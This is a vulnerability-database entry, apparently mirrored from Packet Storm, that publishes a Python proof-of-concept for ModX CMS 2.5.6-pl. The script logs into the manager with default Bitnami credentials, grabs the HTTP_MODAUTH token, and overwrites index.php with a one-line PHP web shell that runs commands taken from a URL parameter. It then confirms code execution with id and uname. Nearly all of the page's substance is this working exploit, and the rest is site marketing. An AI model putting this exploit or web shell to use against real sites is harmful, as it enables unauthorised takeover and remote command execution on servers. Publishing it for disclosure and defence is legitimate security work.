Lucene search
K

ModX CMS Proof Of Concept Shell Upload

🗓️ 31 May 2017 00:00:00Reported by Cody SixteenType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 103 Views

ModX CMS Shell Upload Proof of Concep

Code
`c@kali:~/src/Napalm2.2/libs$ cat shell-modxcms.py  
#!/usr/bin/env python  
# shell-modxcms.py - upload shell for modx 2.5.6-pl  
#   
# !! we need rwx in modx-webdir to go ;Z  
#  
# 30.05.217 @ code610 blogspot com  
#   
  
import requests  
import re  
  
target=raw_input("Hostname> ")  
  
print '[+] Preparing tests for ' + str(target)  
  
session = requests.session()  
sesslink = target + '/manager/'  
  
print '[+] Preparing login request...'  
  
data_login = {  
'login_context':'mgr',  
'modahsh':'',  
'returnUrl':'/manager/',  
'username':'user',  
'password':'bitnami',  
'login':'1'  
}  
data_link = sesslink  
doLogin = session.post(data_link, data=data_login)  
loginResp = doLogin.text  
  
if 'Logout' in loginResp:  
print '[+] We are logged in ;]'  
  
# grab HTTP_MODAUTH to build params for shelluprequest  
modlink = target + '/manager/?a=media/browser'  
getmod = session.get(modlink)  
getmodresp = getmod.text  
  
modfind = re.compile('auth:"(.*?)"')  
modfound = re.search(modfind, loginResp)  
  
if modfound:  
token = modfound.group(1)  
  
print '[+] Found HTTP_MODAUTH token:', token  
  
# preparing shellup req  
shell_data = {  
'action':'browser/file/update',  
'HTTP_MODAUTH':token,  
'wctx':'',  
'source':'1',  
'file':'index.php',  
'content':'<?php system($_GET["x"]);'  
}  
shheader = {'modAuth':token}  
shellreq = target + '/connectors/index.php'  
shellup = session.post(shellreq, data=shell_data, headers=shheader)  
shresp = shellup.text  
  
print '[+] Shell should be ready now. Verifying:'  
shellme = target + '/index.php?x=id;uname -a;pwd'  
shverif = requests.get(shellme)  
print shverif.text  
  
print ''  
  
c@kali:~/src/Napalm2.2/libs$  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 May 2017 00:00Current
0.2Low risk
Vulners AI Score0.2
103